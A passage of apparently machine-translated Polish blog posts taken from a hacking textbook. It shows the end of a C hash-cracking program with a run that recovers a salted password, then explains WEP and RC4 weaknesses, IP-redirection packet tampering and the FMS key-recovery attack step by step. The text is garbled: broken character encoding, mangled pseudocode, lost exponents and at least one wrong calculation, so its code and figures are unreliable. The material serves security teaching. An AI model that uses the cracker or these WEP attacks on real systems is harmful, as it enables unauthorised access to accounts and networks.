fread (bin_vector2, WIDTH, 1, fd); // Odczytaj wektor kojarz�cy bajty 2-4 skr�tu.

len = count_vector_bits (bin_vector2);

printf ("tylko 1 wektor 4:% d par tekstu jawnego, z% 0.2f %% nasycenia n", len,

len * 100,0 /

9025.0)

fseek(fd,(DCM*5)+enum_hashtriplet(pass[4], pass[5], pass[6])*WIDTH, SEEK_SET);

fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 4-6 of hash.

merge(bin_vector2, temp_vector); // Merge it with the first vector.

len = count_vector_bits(bin_vector2);

printf("vectors 1 AND 2 merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len,

len*100.0/9025.0);

fseek(fd,(DCM*6)+enum_hashtriplet(pass[6], pass[7], pass[8])*WIDTH, SEEK_SET);

fread(temp_vector, WIDTH, 1, fd); // Read the vector associating bytes 6-8 of hash.

merge(bin_vector2, temp_vector); // Merge it with the first two vectors.

len = count_vector_bits(bin_vector2);

printf("first 3 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len,

len*100.0/9025.0);

fseek(fd,(DCM*7)+enum_hashtriplet(pass[8], pass[9],pass[10])*WIDTH, SEEK_SET);

fread(temp_vector, WIDTH, 1, fd); // Read the vector associatind bytes 8-10 of hash.

merge(bin_vector2, temp_vector); // Merge it with the othes vectors.

len = count_vector_bits(bin_vector2);

printf("all 4 vectors merged:\t%d plaintext pairs, with %0.2f%% saturation\n", len,

len*100.0/9025.0);

printf("Possible plaintext pairs for the last two bytes:\n");

print_vector(bin_vector2);

printf("Building probability vectors...\n");

for(i=0; i < 9025; i++) { // Find possible first two plaintext bytes.

if(get_vector_bit(bin_vector1, i)==1) {;

prob_vector1[0][pv1_len] = i / 95;

prob_vector1[1][pv1_len] = i - (prob_vector1[0][pv1_len] * 95);

pv1_len++;

}

}

for(i=0; i < 9025; i++) { // Find possible last two plaintext bytes.

if(get_vector_bit(bin_vector2, i)) {

prob_vector2[0][pv2_len] = i / 95;

prob_vector2[1][pv2_len] = i - (prob_vector2[0][pv2_len] * 95);

pv2_len++;

}

}

printf("Cracking remaining %d possibilites..\n", pv1_len*pv2_len);

for(i=0; i < pv1_len; i++) {

for(j=0; j < pv2_len; j++) {

plain[0] = prob_vector1[0][i] + 32;

plain[1] = prob_vector1[1][i] + 32;

plain[2] = prob_vector2[0][j] + 32;

plain[3] = prob_vector2[1][j] + 32;

plain[4] = 0;

if(strcmp(crypt(plain, "je"), pass) == 0) {

printf("Password : %s\n", plain);

i = 31337;

j = 31337;

}

}

}

if(i < 31337)

printf("Password wasn't salted with 'je' or is not 4 chars long.\n");

fclose(fd);

}

Drugi fragment kodu, ppm_crack.c, mo�e zosta� u�yty do z�amania k�opotliwego has�a% h4R w ci�gu kilku sekund:

reader@hacking:~/booksrc $ ./crypt_test h4R% je

password "h4R%" with salt "je" hashes to ==> jeMqqfIfPNNTE

reader@hacking:~/booksrc $ gcc -O3 -o ppm_crack ppm_crack.c -lcrypt

reader@hacking:~/booksrc $ ./ppm_crack jeMqqfIfPNNTE

Filtering possible plaintext bytes for the first two characters:

only 1 vector of 4: 3801 plaintext pairs, with 42.12% saturation

vectors 1 AND 2 merged: 1666 plaintext pairs, with 18.46% saturation

first 3 vectors merged: 695 plaintext pairs, with 7.70% saturation

all 4 vectors merged: 287 plaintext pairs, with 3.18% saturation

Possible plaintext pairs for the first two bytes:

4 9 N !& !M !Q "/ "5 "W #K #d #g #p $K $O $s %) %Z %\ %r &( &T '- '0 '7 'D

'F ( (v (| )+ ). )E )W *c *p *q *t *x +C -5 -A -[ -a .% .D .S .f /t 02 07 0?

0e 0{ 0| 1A 1U 1V 1Z 1d 2V 2e 2q 3P 3a 3k 3m 4E 4M 4P 4X 4f 6 6, 6C 7: 7@ 7S

7z 8F 8H 9R 9U 9_ 9~ :- :q :s ;G ;J ;Z ;k V >X ?1 @#

@W @v @| AO B/ B0 BO Bz C( D8 D> E8 EZ F@ G& G? Gj Gy H4 I@ J JN JT JU Jh Jq

Ks Ku M) M{ N, N: NC NF NQ Ny O/ O[ P9 Pc Q! QA Qi Qv RA Sg Sv T0 Te U& U> UO

VT V[ V] Vc Vg Vi W: WG X" X6 XZ X` Xp YT YV Y^ Yl Yy Y{ Za [$ [* [9 [m [z \" \

+ \C \O \w ]( ]: ]@ ]w _K _j `q a. aN a^ ae au b: bG bP cE cP dU d] e! fI fv g!

gG h+ h4 hc iI iT iV iZ in k. kp l5 l` lm lq m, m= mE n0 nD nQ n~ o# o: o^ p0

p1 pC pc q* q0 qQ q{ rA rY s" sD sz tK tw u- v$ v. v3 v; v_ vi vo wP wt x" x&

x+ x1 xQ xX xi yN yo zO zP zU z[ z^ zf zi zr zt {- {B {a |s }) }+ }? }y ~L ~m

Filtering possible plaintext bytes for the last two characters:

only 1 vector of 4: 3821 plaintext pairs, with 42.34% saturation

vectors 1 AND 2 merged: 1677 plaintext pairs, with 18.58% saturation

first 3 vectors merged: 713 plaintext pairs, with 7.90% saturation

all 4 vectors merged: 297 plaintext pairs, with 3.29% saturation

Possible plaintext pairs for the last two bytes:

! & != !H !I !K !P !X !o !~ "r "{ "} #% #0 $5 $] %K %M %T &" &% &( &0 &4 &I

&q &} 'B 'Q 'd )j )w *I *] *e *j *k *o *w *| +B +W ,' ,J ,V -z . .$ .T /' /_

0Y 0i 0s 1! 1= 1l 1v 2- 2/ 2g 2k 3n 4K 4Y 4\ 4y 5- 5M 5O 5} 6+ 62 6E 6j 7* 74

8E 9Q 9\ 9a 9b :8 :; :A :H :S :w ;" ;& ;L v >x ?& ?` ?j

?w @0 A* B B@ BT C8 CF CJ CN C} D+ D? DK Dc EM EQ FZ GO GR H) Hj I: I> J( J+

J3 J6 Jm K# K) K@ L, L1 LT N* NW N` O= O[ Ot P: P\ Ps Q- Qa R% RJ RS S3 Sa T!

T$ T@ TR T_ Th U" U1 V* V{ W3 Wy Wz X% X* Y* Y? Yw Z7 Za Zh Zi Zm [F \( \3 \5 \

_ \a \b \| ]$ ]. ]2 ]? ]d ^[ ^~ `1 `F `f `y a8 a= aI aK az b, b- bS bz c( cg dB

e, eF eJ eK eu fT fW fo g( g> gW g\ h$ h9 h: h@ hk i? jN ji jn k= kj l7 lo m<

m= mT me m| m} n% n? n~ o oF oG oM p" p9 p\ q} r6 r= rB sA sN s{ s~ tX tp u

u2 uQ uU uk v# vG vV vW vl w* w> wD wv x2 xA y: y= y? yM yU yX zK zv {# {) {=

{O {m |I |Z }. }; }d ~+ ~C ~a

Building probability vectors...

Cracking remaining 85239 possibilites..

Password : h4R%

reader@hacking:~/booksrc $

Programy te s� hackami typu proof-of-concept, kt�re wykorzystuj� dyfuzj� bit�w zapewnian� przez funkcje mieszaj�ce. Istniej� inne ataki kompromisowe w czasie i przestrzeni, a niekt�re sta�y si� do�� popularne. RainbowCrack to popularne narz�dzie, kt�re obs�uguje wiele algorytm�w. Je�li chcesz dowiedzie� si� wi�cej, zajrzyj do Internetu

Powr�t

03.11.2020 Szyfrowanie bezprzewodowe 802.11b

Zabezpieczenie bezprzewodowe 802.11b stanowi du�y problem, g��wnie z powodu jego braku. S�abe strony Wired Equivalent Privacy (WEP), metody szyfrowania u�ywanej w sieci bezprzewodowej, w znacznym stopniu przyczyniaj� si� do og�lnej niepewno�ci. Istniej� inne szczeg�y, czasami ignorowane podczas wdra�ania bezprzewodowego, kt�re mog� r�wnie� prowadzi� do powa�nych luk. Fakt, �e sieci bezprzewodowe istniej� na warstwie 2, jest jednym z tych szczeg��w. Je�li sie� bezprzewodowa nie jest wy��czona z sieci VLAN lub zapora ogniowa, osoba atakuj�ca powi�zana z punktem dost�pu bezprzewodowego mo�e przekierowa� ca�y ruch sieci przewodowej przez sie� bezprzewodow� za pomoc� przekierowania ARP. To, w po��czeniu z tendencj� do ��czenia bezprzewodowych punkt�w dost�pu z wewn�trznymi sieciami prywatnymi, mo�e prowadzi� do powa�nych luk. Oczywi�cie, je�li w��czono WEP, tylko klienci z odpowiednim kluczem WEP b�d� mogli skojarzy� si� z punktem dost�pu. Je�li WEP jest bezpieczny, nie powinno by� �adnych obaw zwi�zanych z kojarzeniem nieuczciwych napastnik�w i spowodowaniem spustoszenia. Nasuwa si� pytanie: "Jak bezpieczny jest WEP?"

Wired Equivalent Privacy

WEP mia� by� metod� szyfrowania zapewniaj�c� bezpiecze�stwo r�wnowa�ne przewodowemu punktowi dost�powemu. Pierwotnie zosta� zaprojektowany z 40-bitowymi kluczami; p�niej pojawi� si� WEP2, aby zwi�kszy� rozmiar klucza do 104 bit�w. Ca�e szyfrowanie odbywa si� na podstawie poszczeg�lnych pakiet�w, wi�c ka�dy pakiet jest zasadniczo osobn� wiadomo�ci� tekstow� do wys�ania. Pakiet zostanie nazwany M. Najpierw obliczana jest suma kontrolna komunikatu M, wi�c integralno�� wiadomo�ci mo�na sprawdzi� p�niej. Odbywa si� to przy u�yciu 32-bitowej funkcji sumy kontrolnej nadmiarowo�ci cyklicznej o nazwie CRC32. Ta suma kontrolna b�dzie nazywana CS, wi�c CS = CRC32 (M). Ta warto�� jest do��czana na ko�cu komunikatu, kt�ry tworzy wiadomo�� tekstow� P Teraz wiadomo�� w postaci zwyk�ego tekstu musi by� zaszyfrowana. Odbywa si� to za pomoc� RC4, kt�ry jest szyfrem strumieniowym. Szyfr zainicjowany warto�ci� pocz�tkow� mo�e generowa� strumie� klucza, kt�ry jest po prostu arbitralnie d�ugim strumieniem pseudolosowych bajt�w. WEP u�ywa wektora inicjuj�cego (IV) dla warto�ci pocz�tkowej. IV sk�ada si� z 24 bit�w generowanych dla ka�dego pakietu. Niekt�re starsze implementacje WEP po prostu u�ywaj� warto�ci sekwencyjnych dla IV, podczas gdy inne u�ywaj� jakiej� formy pseudolosowego. Niezale�nie od tego, jak zostan� wybrane 24 bity IV, s� one do��czane do klucza WEP. (Te 24 bity IV s� uwzgl�dnione w rozmiarze klucza WEP przy odrobinie sprytnego obrotu marketingowego; gdy sprzedawca m�wi o 64-bitowych lub 128-bitowych kluczach WEP, rzeczywiste klucze maj� odpowiednio tylko 40 bit�w i 104 bity, ��cznie z 24 bitami IV.) Klucz IV i WEP razem tworz� warto�� pocz�tkow�, kt�ra b�dzie si� nazywa�a S. Nast�pnie warto�� pocz�tkowa S jest podawana do RC4, co generuje strumie� klucza. Ten strumie� klucza jest XORowany z wiadomo�ci� tekstow� P w celu utworzenia tekstu zaszyfrowanego C. IV jest do��czony do tekstu zaszyfrowanego, a ca�a rzecz jest hermetyzowana innym nag��wkiem i wysy�ana przez ��cze radiowe Gdy odbiorca otrzyma pakiet zaszyfrowany WEP, proces jest po prostu odwracany. Odbiorca pobiera IV z wiadomo�ci, a nast�pnie ��czy IV z w�asnym kluczem WEP, aby wytworzy� warto�� pocz�tkow� S. Je�li nadawca i odbiorca maj� ten sam klucz WEP, warto�ci pocz�tkowe b�d� takie same. Ten materia� siewny jest ponownie wprowadzany do RC4 w celu wygenerowania tego samego strumienia klucza, kt�ry jest XORowany z reszt� zaszyfrowanej wiadomo�ci. Spowoduje to wygenerowanie oryginalnej wiadomo�ci w postaci jawnego tekstu, sk�adaj�cej si� z wiadomo�ci M pakietu po��czonej z sum� kontroln� integralno�ci CS. Nast�pnie odbiorca u�ywa tej samej funkcji CRC32 do ponownego obliczenia sumy kontrolnej dla M i sprawdza, czy obliczona warto�� odpowiada otrzymanej warto�ci CS. Je�li sumy kontrolne s� zgodne, pakiet jest przekazywany dalej. W przeciwnym razie wyst�pi�o zbyt wiele b��d�w transmisji lub klucze WEP nie pasowa�y, a pakiet zosta� odrzucony. To w zasadzie WEP w pigu�ce.

Powr�t

04.11.2020 Szyfr strumieniowy RC4

RC4 to zaskakuj�co prosty algorytm. Sk�ada si� z dw�ch algorytm�w: algorytmu planowania kluczowego (KSA) i algorytmu Pseudo-losowego generowania (PRGA). Oba te algorytmy u�ywaj� S-boxu 8 na 8, kt�ry jest tylko tablic� 256 liczb, kt�re s� unikalne i maj� zakres od 0 do 255. M�wi�c prosto, wszystkie liczby od 0 do 255 istniej� w tablicy , ale wszystkie s� po prostu wymieszane na r�ne sposoby. KSA wykonuje pocz�tkowe szyfrowanie skrzynki S, w oparciu o wprowadzon� do niej warto�� pocz�tkow�, a ziarno mo�e mie� d�ugo�� do 256 bit�w. Po pierwsze, tablica S-box jest wype�niana sekwencyjnymi warto�ciami od 0 do 255. Ta tablica b�dzie trafnie nazwana S. Nast�pnie kolejna 256-bajtowa tablica jest wype�niana warto�ci� pocz�tkow�, powtarzaj�c w razie potrzeby, a� ca�a tablica zostanie wype�niona. Ta tablica zostanie nazwana K. Nast�pnie tablica S jest szyfrowana przy u�yciu nast�puj�cego pseudo-kodu.

j = 0;

dla i = 0 do 255

{

j = (j + S [i] + K [i]) mod 256;

zamie� S [i] i S [j];

}

Gdy to si� sko�czy, pole S-wszystko jest pomieszane na podstawie warto�ci pocz�tkowej. To kluczowy algorytm planowania. Do�� proste. Teraz, gdy potrzebne s� dane strumieniowe, wykorzystywany jest algorytm Pseudo-Random Generation (PRGA). Algorytm ten ma dwa liczniki, i i j, kt�re s� inicjowane od 0 na pocz�tku. Nast�pnie dla ka�dego bajtu danych strumienia klucza u�ywany jest nast�puj�cy pseudo kod.

i = (i + 1) mod 256;

j = (j + S [i]) mod 256;

zamie� S [i] i S [j];

t = (S [+] + S [j]) mod 256;

Wydaj warto�� S [t];

Wyprowadzony bajt S [t] jest pierwszym bajtem strumienia klucza. Ten algorytm jest powtarzany dla dodatkowych bajt�w strumienia klucza. RC4 jest na tyle prosty, �e mo�na go �atwo zapami�ta� i zaimplementowa� w locie, i jest ca�kiem bezpieczny, je�li jest w�a�ciwie u�ywany. Istnieje jednak kilka problem�w ze sposobem u�ywania RC4 do WEP

Powr�t

05.11.2020

Ataki WEP

Istnieje kilka problem�w zwi�zanych z bezpiecze�stwem WEP. W ca�ej uczciwo�ci nigdy nie mia� by� silnym protoko�em kryptograficznym, ale raczej sposobem na zapewnienie przewodowej r�wnowa�no�ci, o kt�rej mowa w akronimie. Poza s�abo�ciami bezpiecze�stwa zwi�zanymi ze stowarzyszeniem i to�samo�ciami, istnieje kilka problem�w z samym protoko�em kryptograficznym. Niekt�re z tych problem�w wynikaj� z u�ycia CRC32 jako funkcji sumy kontrolnej dla integralno�ci wiadomo�ci, a inne problemy wynikaj� ze sposobu u�ywania IV.

Ataki Brute-Force offline

Brute forcing zawsze b�dzie mo�liwym atakiem na dowolny bezpieczny komputerowo system. Pozostaje tylko pytanie, czy jest to atak praktyczny, czy nie. Dzi�ki WEP rzeczywista metoda wymuszania brutalnego trybu offline jest prosta: przechwy� kilka pakiet�w, a nast�pnie spr�buj odszyfrowa� pakiety przy u�yciu ka�dego mo�liwego klucza. Nast�pnie ponownie oblicz sum� kontroln� pakietu i por�wnaj j� z oryginaln� sum� kontroln�. Je�li pasuj�, to najprawdopodobniej klucz. Zwykle musi to by� wykonane przy u�yciu co najmniej dw�ch pakiet�w, poniewa� prawdopodobne jest, �e pojedynczy pakiet mo�e zosta� odszyfrowany za pomoc� niepoprawnego klucza, ale suma kontrolna b�dzie nadal wa�na. Jednak przy za�o�eniu 10 000 p�kni�� na sekund� brutalne wymuszanie przez 40-bitow� przestrze� kluczow� zaj�oby ponad trzy lata. Realistycznie, nowoczesne procesory mog� osi�gn�� ponad 10 000 p�kni�� na sekund�, ale nawet przy 200 000 p�kni�� na sekund� zajmie to kilka miesi�cy. W zale�no�ci od zasob�w i po�wi�cenia atakuj�cego ten typ ataku mo�e by� wykonalny lub nie. Tim Newsham dostarczy� skuteczn� metod� �amania, kt�ra atakuje s�abo�ci algorytmu generowania kluczy opartego na has�ach, kt�ry jest u�ywany przez wi�kszo�� 40-bitowych (sprzedawanych jako 64-bitowe) kart i punkt�w dost�pu. Jego metoda skutecznie redukuje 40-bitow� przestrze� klucza do 21 bit�w, kt�ra mo�e zosta� z�amana w ci�gu kilku minut przy za�o�eniu 10 000 p�kni�� na sekund� (iw ci�gu kilku sekund na nowoczesnym procesorze). W przypadku 104-bitowych (sprzedawanych jako 128-bitowe) sieci WEP wymuszanie nie jest mo�liwe.

Keystream Reuse

Innym potencjalnym problemem zwi�zanym z WEP jest ponowne wykorzystanie klucza. Je�li dwa teksty jawne (P) s� XOR z tym samym strumieniem klucza, aby wytworzy� dwa oddzielne teksty zaszyfrowane (C), XORowanie tych tekst�w szyfrowych razem anuluje strumie� klucza, co powoduje, �e dwa jawne teksty XOR s� ze sob� powi�zane. St�d, je�li znany jest jeden z jawnych tekst�w, drugi mo�na �atwo odzyska�. Ponadto, poniewa� jawne teksty w tym przypadku s� pakietami internetowymi o znanej i do�� przewidywalnej strukturze, mo�na zastosowa� r�ne techniki do odzyskiwania zar�wno oryginalnych tekst�w jawnych. IV ma zapobiega� takim atakom; bez niego ka�dy pakiet by�by szyfrowany przy u�yciu tego samego strumienia klucza. Je�li dla ka�dego pakietu u�ywany jest inny IV, strumienie kluczy dla pakiet�w r�wnie� b�d� r�ne. Je�li jednak ten sam IV zostanie ponownie u�yty, oba pakiety zostan� zaszyfrowane tym samym strumieniem klucza. Jest to warunek �atwy do wykrycia, poniewa� IV s� zawarte w zwyk�ym tek�cie w zaszyfrowanych pakietach. Co wi�cej, IV u�ywane w WEP maj� tylko 24 bity d�ugo�ci, co prawie gwarantuje, �e IVy zostan� ponownie wykorzystane. Zak�adaj�c, �e IV s� wybierane losowo, statystycznie powinien istnie� przypadek ponownego u�ycia klucza po zaledwie 5000 pakiet�w. Ta liczba wydaje si� zaskakuj�co ma�a z powodu sprzecznego z intuicj� probabilistycznego zjawiska znanego jako urodzinowy paradoks. Ten paradoks stwierdza, �e je�li 23 osoby znajduj� si� w tym samym pokoju, dwie osoby powinny dzieli� urodziny. Z 23 osobami s� (23 � 22) / 2 lub 253 mo�liwe pary. Ka�da para ma prawdopodobie�stwo sukcesu r�wne 1/365, czyli oko�o 0,27 procent, co odpowiada prawdopodobie�stwu niepowodzenia 1 - (1/365) lub oko�o 99,726 procent. Podnosz�c to prawdopodobie�stwo do mocy 253, og�lne prawdopodobie�stwo niepowodzenia wynosi oko�o 49,95 procent, co oznacza, �e prawdopodobie�stwo sukcesu wynosi niewiele ponad 50 procent. Dzia�a to w ten sam spos�b w przypadku kolizji IV. Przy 5000 pakiet�w dost�pnych jest (5000 � 4999) / 2 lub 12 497 500 mo�liwych par. Ka�da para ma prawdopodobie�stwo niepowodzenia 1 - (1/224). Gdy zostanie to zwi�kszone do pot�gi liczby mo�liwych par, og�lne prawdopodobie�stwo niepowodzenia wynosi oko�o 47,5 procent, co oznacza, �e istnieje 52,5 procent szans na kolizj� IV z 5000 pakiet�w: Po wykryciu kolizji IV, niekt�re wyuczone domys�y na temat struktury jawnych tekst�w mog� by� u�yte do ujawnienia oryginalnych tekst�w jawnych przez XORowanie dw�ch szyfrogram�w razem. Ponadto, je�li znany jest jeden z jawnych tekst�w, inny zwyk�y tekst mo�na odzyska� za pomoc� prostego XOR.

Powr�t

06.11.2020

Tabele s�ownika deszyfrowania opartego na IV

Po odzyskaniu jawnych tekst�w dla przechwyconej wiadomo�ci, znany b�dzie r�wnie� strumie� kluczy dla tego IV. Oznacza to, �e ten strumie� klucza mo�e by� u�yty do odszyfrowania dowolnego innego pakietu o tym samym IV, pod warunkiem, �e nie jest d�u�szy ni� odzyskany strumie� klucza. Z czasem mo�liwe jest utworzenie tabeli strumieni kluczy indeksowanych przez co mo�liwe IV. Poniewa� istnieje tylko 224 mo�liwych IV, je�li 1500 bajt�w strumienia klucza jest zapisanych dla ka�dego IV, tabela wymaga�aby tylko oko�o 24 GB pami�ci. Po utworzeniu takiej tabeli wszystkie kolejne zaszyfrowane pakiety mo�na �atwo odszyfrowa�. Realistycznie, ta metoda ataku by�aby bardzo czasoch�onna i nu��ca. To ciekawy pomys�, ale s� o wiele �atwiejsze sposoby na pokonanie WEP.

Przekierowanie IP

Innym sposobem odszyfrowania zaszyfrowanych pakiet�w jest oszukanie punktu dost�pu do wykonania ca�ej pracy. Zwykle punkty dost�pu bezprzewodowego maj� pewn� form� po��czenia z Internetem, a je�li tak jest, mo�liwy jest atak przekierowania IP. Najpierw przechwytywany jest zaszyfrowany pakiet, a adres docelowy jest zmieniany na adres IP kontrolowany przez atakuj�cego, bez odszyfrowywania pakietu. Nast�pnie zmodyfikowany pakiet jest przesy�any z powrotem do bezprzewodowego punktu dost�powego, kt�ry odszyfruje pakiet i wy�le go bezpo�rednio na adres IP atakuj�cego. Modyfikacja pakietu jest mo�liwa dzi�ki sumie kontrolnej CRC32 b�d�cej liniow� funkcj� bez klawisza. Oznacza to, �e pakiet mo�e by� strategicznie zmodyfikowany, a suma kontrolna nadal b�dzie taka sama. Ten atak zak�ada r�wnie�, �e znane s� �r�d�owe i docelowe adresy IP. Informacje te s� na tyle �atwe, �e mo�na je okre�li� na podstawie standardowych schemat�w adresowania IP w sieci wewn�trznej. Ponadto, kilka przypadk�w ponownego u�ycia strumienia klucza z powodu kolizji IV mo�na wykorzysta� do okre�lenia adres�w. Gdy znany jest docelowy adres IP, warto�� t� mo�na XOR-owa� z ��danym adresem IP, a ca�a ta rzecz mo�e zosta� przeniesiona na miejsce w zaszyfrowanym pakiecie. XORowanie docelowego adresu IP zostanie anulowane, pozostawiaj�c ��dany adres IP XORed ze strumieniem klucza. Nast�pnie, aby upewni� si�, �e suma kontrolna pozostaje taka sama, �r�d�owy adres IP musi by� strategicznie zmodyfikowany.

Za��my na przyk�ad, �e adres �r�d�owy to 192.168.2.57, a adres docelowy to 192.168.2.1. Atakuj�cy kontroluje adres 123.45.67.89 i chce tam przekierowa� ruch. Te adresy IP istniej� w pakiecie w postaci binarnej 16-bitowych s��w wysokiego i niskiego rz�du. Konwersja jest do�� prosta. Suma kontrolna zostanie zmieniona przez NH + NL - DH - DL, wi�c ta warto�� musi zosta� odj�ta od innego miejsca w pakiecie. Poniewa� adres �r�d�owy jest r�wnie� znany i nie ma wi�kszego znaczenia, 16-bitowe s�owo ni�szego rz�du tego adresu IP jest dobrym celem:

S'L = SL - (NH + NL - DH - DL)

S'L = 569 - (31533 + 17241 - 50344 - 513)

S'L = 2652

Nowy �r�d�owy adres IP powinien zatem wynosi� 192.168.10.92. �r�d�owy adres IP mo�e by� modyfikowany w zaszyfrowanym pakiecie przy u�yciu tej samej sztuczki XORing, a nast�pnie sumy kontrolne powinny by� zgodne. Gdy pakiet zostanie wys�any do punktu dost�pu bezprzewodowego, pakiet zostanie odszyfrowany i wys�any do 123.45.67.89, gdzie atakuj�cy mo�e go odzyska�. Je�li atakuj�cy ma mo�liwo�� monitorowania pakiet�w w ca�ej sieci klasy B, adres �r�d�owy nie musi nawet by� modyfikowany. Zak�adaj�c, �e atakuj�cy mia� kontrol� nad ca�ym zakresem adres�w IP 123.45.X.X, 16-bitowe s�owo adresu IP ni�szego rz�du mog�oby by� strategicznie wybrane, aby nie zak��ca� sumy kontrolnej. Je�li NL = DH + DL - NH, suma kontrolna nie zostanie zmieniona.

Oto przyk�ad:

NL = DH + DL - NH

NL = 50,344 + 513 - 31,533

N'L = 82390

Nowy docelowy adres IP powinien wynosi� 123.45.75.124.

Powr�t

07.11.2020

Fluhrer, Mantin i Shamir Attack

Atak Fluhrer, Mantin i Shamir (FMS) jest najcz�ciej stosowanym atakiem przeciwko WEP, spopularyzowanym przez narz�dzia takie jak AirSnort. Ten atak jest naprawd� niesamowity. Wykorzystuje s�abo�ci algorytmu kluczowania RC4 i wykorzystania IV. S� s�abe warto�ci IV, kt�re przeciekaj� informacje o tajnym kluczu w pierwszym bajcie strumienia klucza. Poniewa� ten sam klucz jest u�ywany wielokrotnie w r�nych IV, je�li zbierane s� wystarczaj�ce pakiety ze s�abymi IV, a pierwszy bajt strumienia klucza jest znany, klucz mo�na okre�li�. Na szcz�cie pierwszy bajt pakietu 802.11b to nag��wek snap, kt�ry prawie zawsze wynosi 0xAA. Oznacza to, �e pierwszy bajt strumienia klucza mo�na �atwo uzyska� przez XORowanie pierwszego zaszyfrowanego bajtu za pomoc� 0xAA. Nast�pnie nale�y zlokalizowa� s�abe IV. IV dla WEP to 24 bity, co przek�ada si� na trzy bajty. S�abe IV s� w formie (A + 3, N - 1, X), gdzie A jest bajtem klucza do ataku, N jest 256 (poniewa� RC4 dzia�a w modulo 256), a X mo�e by� dowoln� warto�ci�. Tak wi�c, je�li zerowy bajt strumienia klucza jest atakowany, by�oby 256 s�abych IV w postaci (3, 255, X), gdzie Xranges od 0 do 255. Bajty strumienia klucza musz� by� zaatakowane w kolejno�ci, wi�c pierwszy bajt nie mo�e zosta� zaatakowany, dop�ki nie b�dzie znany zerowy bajt. Sam algorytm jest ca�kiem prosty. Najpierw wykonuje A + 3 kroki algorytmu planowania klucza (KSA). Mo�na to zrobi� bez znajomo�ci klucza, poniewa� IV zajmie pierwsze trzy bajty tablicy K. Je�li zerowy bajt klucza jest znany, a A r�wna si� 1, KSA mo�na przerobi� do czwartego kroku, poniewa� znane b�d� pierwsze cztery bajty tablicy K. W tym momencie, je�li S [0] lub S [1] zosta�y zak��cone w ostatnim kroku, ca�a pr�ba powinna zosta� odrzucona. M�wi�c pro�ciej, je�li j jest mniejsze ni� 2, pr�ba powinna zosta� odrzucona. W przeciwnym razie we� warto�� j i warto�� S [A + 3] i odejmij obie warto�ci od pierwszego bajtu strumienia klucza (oczywi�cie modulo 256). Ta warto�� b�dzie prawid�owym bajtem klucza oko�o 5 procent czasu i losowo mniej ni� 95 procent czasu. Je�li jest to zrobione z wystarczaj�c� ilo�ci� s�abych IV (z r�nymi warto�ciami dla X), mo�na okre�li� poprawny bajt klucza. Potrzeba oko�o 60 IV, aby zwi�kszy� prawdopodobie�stwo powy�ej 50 procent. Po okre�leniu jednego bajtu klucza ca�y proces mo�e by� ponownie wykonany, aby okre�li� nast�pny bajt klucza, a� ca�y klucz zostanie ujawniony. Dla cel�w demonstracyjnych RC4 zostanie przeskalowany, wi�c N r�wna si� 16 zamiast 256. Oznacza to, �e wszystko jest modulo 16 zamiast 256, a wszystkie tablice to 16 "bajt�w" sk�adaj�cych si� z 4 bit�w, zamiast 256 rzeczywistych bajt�w. Zak�adaj�c, �e klucz jest (1, 2, 3, 4, 5), a zerowy bajt klucza zostanie zaatakowany, A r�wna si� 0. Oznacza to, �e s�abe IV powinny mie� posta� (3, 15, X). W tym przyk�adzie X b�dzie r�wne 2, wi�c warto�ci� pocz�tkow� b�dzie (3, 15, 2, 1, 2, 3, 4, 5). U�ywaj�c tego materia�u pocz�tkowego, pierwszy bajt wyj�cia strumienia klucza b�dzie wynosi� 9.

wyj�cie = 9

A = 0

IV = 3, 15, 2

Klawisz = 1, 2, 3, 4, 5

Seed = IV po��czony z kluczem

K [] = 3 15 2 X X X X 3 15 2 X X X X X

S [] = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

Poniewa� klucz jest obecnie nieznany, tablica K jest za�adowana tym, co jest obecnie znane, a tablica S jest wype�niona sekwencyjnymi warto�ciami od 0 do 15. Nast�pnie j jest inicjowane na 0, a pierwsze trzy kroki KSA to Gotowe. Pami�taj, �e ca�a matematyka jest wykonywana modulo 16.

Krok pierwszy KSA:

i = 0

j = j + S [i] + K [i]

j = 0 + 0 + 3 = 3

Zamie� S [i] i S [j]

K [] = 3 15 2 X X X X 3 15 2 X X X X X

S [] = 3 1 2 0 4 5 6 7 8 9 10 11 12 13 14 15

Krok drugi KSA:

i = 1

j = j + S [i] + K [i]

j = 3 + 1 + 15 = 3

Zamie� S [i] i S [j]

K [] = 3 15 2 X X X X 3 15 2 X X X X X

S [] = 3 0 2 1 4 5 6 7 8 9 10 11 12 13 14 15

Krok trzeci KSA:

i = 2

j = j + S [i] + K [i]

j = 3 + 2 + 2 = 7

Zamie� S [i] i S [j]

K [] = 3 15 2 X X X X 3 15 2 X X X X X

S [] = 3 0 7 1 4 5 6 2 8 9 10 11 12 13 14 15

W tym momencie j nie jest mniejsze ni� 2, wi�c proces mo�e by� kontynuowany. S [3] to 1, j to 7, a pierwszy bajt wyj�cia strumienia klucza wynosi� 9. Zatem zerowy bajt klucza powinien wynosi� 9 -7 -1 = 1. Informacje te mo�na wykorzysta� do okre�lenia nast�pnego bajtu klucz, u�ywaj�c IV w postaci (4, 15, X) i dzia�aj�c KSA do czwartego kroku. U�ywaj�c IV (4, 15, 9), pierwszy bajt strumienia klucza wynosi 6.

wyj�cie = 6

A = 0

IV = 4, 15, 9

Klawisz = 1, 2, 3, 4, 5

Seed = IV po��czony z kluczem

K [] = 4 15 9 1 X X X 4 15 9 1 X X X X

S [] = 0 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15

Krok pierwszy KSA:

i = 0

j = j + S [i] + K [i]

j = 0 + 0 + 4 = 4

Zamie� S [i] i S [j]

K [] = 4 15 9 1 X X X 4 15 9 1 X X X X

S [] = 4 1 2 3 0 5 6 7 8 9 10 11 12 13 14 15

Krok drugi KSA:

i = 1

j = j + S [i] + K [i]

j = 4 + 1 + 15 = 4

Zamie� S [i] i S [j]

K [] = 4 15 9 1 X X X 4 15 9 1 X X X X

S [] = 4 0 2 3 1 5 6 7 8 9 10 11 12 13 14 15

Krok trzeci KSA:

i = 2

j = j + S [i] + K [i]

j = 4 + 2 + 9 = 15

Zamie� S [i] i S [j]

K [] = 4 15 9 1 X X X 4 15 9 1 X X X X

S [] = 4 0 15 3 1 5 6 7 8 9 10 11 12 13 14 2

Krok czwarty KSA:

i = 3

j = j + S [i] + K [i]

j = 15 + 3 + 1 = 3

Zamie� S [i] i S [j]

K [] = 4 15 9 1 X X X 4 15 9 1 X X X X

S [] = 4 0 15 3 1 5 6 7 8 9 10 11 12 13 14 2

wyj�cie -j - S [4] = klucz [1]

